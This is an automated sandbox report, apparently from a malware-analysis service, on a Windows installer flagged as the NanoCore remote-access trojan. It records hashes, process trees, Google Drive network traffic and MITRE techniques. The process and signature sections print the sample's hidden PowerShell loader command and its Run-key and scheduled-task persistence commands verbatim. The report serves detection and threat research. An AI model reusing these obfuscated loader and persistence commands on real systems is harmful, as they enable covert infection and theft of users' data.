Malware Analysis Report

2024-08-06 15:23

Sample ID 240517-y5jdfahc31
Target 2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
SHA256 01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389
Tags
nanocore execution keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389

Threat Level: Known bad

The file 2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

nanocore execution keylogger persistence spyware stealer trojan

NanoCore

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

NSIS installer

Creates scheduled task(s)

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-17 20:22

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-17 20:22

Reported

2024-05-17 20:24

Platform

win7-20240508-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

Signatures

NanoCore

keylogger trojan stealer spyware nanocore

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fremfrings = "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\\Crepidoma\\').Fozinesses;%Taletiden% ($Typecasts)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Monitor = "C:\\Program Files (x86)\\NTFS Monitor\\ntfsmon.exe" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1648 set thread context of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vulnerabilities\Navettes131.ini C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\0409\sporeforming.bal C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\stereotypery.teu C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 356 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 356 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 356 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 356 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2068 wrote to memory of 2152 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2068 wrote to memory of 2152 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2068 wrote to memory of 2152 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2068 wrote to memory of 2152 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2152 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2152 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2152 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2068 wrote to memory of 1100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 1100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 1100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 1100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2296 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2296 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2296 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2296 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Afspadserede225=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr';$Novelettish=$Afspadserede225.SubString(53200,3);.$Novelettish($Afspadserede225)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "NTFS Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "NTFS Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp

Files

memory/1648-9-0x0000000074201000-0x0000000074202000-memory.dmp

memory/1648-13-0x0000000074200000-0x00000000747AB000-memory.dmp

memory/1648-12-0x0000000074200000-0x00000000747AB000-memory.dmp

memory/1648-11-0x0000000074200000-0x00000000747AB000-memory.dmp

memory/1648-10-0x0000000074200000-0x00000000747AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr

MD5 6b3ce49e30626debe4ebc638e79bfbc1
SHA1 f0941c7b2694735091249b1676e4ba7693e6ede9
SHA256 bebd427c3ece459de5fc091d4573f313ba55bf68bdad2dbaf9f8ec5637b4990e
SHA512 d1bd3fb17897cba3fa4e9bde3b7bc7b73c88edb72cb47bc439b866c45f77ae85d01c6d9941ebc574ef660c33395b804a441bf9cef370b0c5dedbd3a1ac604e5d

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Milieugifts.Koa

MD5 c1db703a47e0df7927aed1ab569b7ba7
SHA1 9b13decd58b8c434974ec24141b29e07ad008297
SHA256 7956dcaf28392b383184aec8e81c6c2f0b8d6c12fb889360c1a8f51a85912fb5
SHA512 b920cb5d9663eb3372a2c112b439dd83deb438d432b61bec63e697ae66d2131f169d18592e9e8c5213ee3f591bad8fa1b724915cd4f01d0d45c79070ae6d7977

memory/1648-17-0x0000000006790000-0x000000000B171000-memory.dmp

memory/1648-18-0x0000000074200000-0x00000000747AB000-memory.dmp

memory/2068-19-0x0000000000660000-0x00000000016C2000-memory.dmp

memory/2068-42-0x0000000000660000-0x00000000016C2000-memory.dmp

memory/2068-44-0x0000000000660000-0x000000000069A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp

MD5 5ccc18c3f1852b87de26278cba055c13
SHA1 9233db8c004ac3e1b34c0782bac706a17bdc43ae
SHA256 7d588a9e361cccb0a3c97ec7ac99efe60e82932c64ab6efbfc929f51acb38432
SHA512 1ad0e9d090e93bdfa76c7ff60c5492c43265f53adf0ac23a7c831231e12822b11bae6d0840f92c8deddc9e08dbb383d24073ece791feaf36687692a437294ed7

C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp

MD5 981e126601526eaa5b0ad45c496c4465
SHA1 d610d6a21a8420cc73fcd3e54ddae75a5897b28b
SHA256 11ae277dfa39e7038b782ca6557339e7fe88533fe83705c356a1500a1402d527
SHA512 a59fb704d931ccb7e1ec1a7b98e24ccd8708be529066c6de4b673098cdebef539f7f50d9e051c43954b5a8e7f810862b3a4ede170f131e080dadc3e763ed4bdb

memory/2068-52-0x00000000215C0000-0x00000000215CA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-17 20:22

Reported

2024-05-17 20:24

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vulnerabilities\Navettes131.ini C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\0409\sporeforming.bal C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\stereotypery.teu C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1344 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1344 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1344 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 2080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 2080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 2080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Afspadserede225=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr';$Novelettish=$Afspadserede225.SubString(53200,3);.$Novelettish($Afspadserede225)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2208 -ip 2208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 2548

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp

Files

memory/2208-7-0x00000000737CE000-0x00000000737CF000-memory.dmp

memory/2208-8-0x00000000029D0000-0x0000000002A06000-memory.dmp

memory/2208-10-0x00000000737C0000-0x0000000073F70000-memory.dmp

memory/2208-9-0x0000000005260000-0x0000000005888000-memory.dmp

memory/2208-11-0x0000000005010000-0x0000000005032000-memory.dmp

memory/2208-12-0x0000000005900000-0x0000000005966000-memory.dmp

memory/2208-14-0x0000000005970000-0x00000000059D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ljnm0o24.dou.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2208-13-0x00000000737C0000-0x0000000073F70000-memory.dmp

memory/2208-24-0x00000000059E0000-0x0000000005D34000-memory.dmp

memory/2208-25-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

memory/2208-26-0x0000000006000000-0x000000000604C000-memory.dmp

memory/2208-28-0x0000000006500000-0x000000000651A000-memory.dmp

memory/2208-27-0x0000000006540000-0x00000000065D6000-memory.dmp

memory/2208-29-0x0000000006FB0000-0x0000000006FD2000-memory.dmp

memory/2208-30-0x0000000007590000-0x0000000007B34000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr

MD5 6b3ce49e30626debe4ebc638e79bfbc1
SHA1 f0941c7b2694735091249b1676e4ba7693e6ede9
SHA256 bebd427c3ece459de5fc091d4573f313ba55bf68bdad2dbaf9f8ec5637b4990e
SHA512 d1bd3fb17897cba3fa4e9bde3b7bc7b73c88edb72cb47bc439b866c45f77ae85d01c6d9941ebc574ef660c33395b804a441bf9cef370b0c5dedbd3a1ac604e5d

memory/2208-32-0x00000000081C0000-0x000000000883A000-memory.dmp

memory/2208-34-0x00000000737C0000-0x0000000073F70000-memory.dmp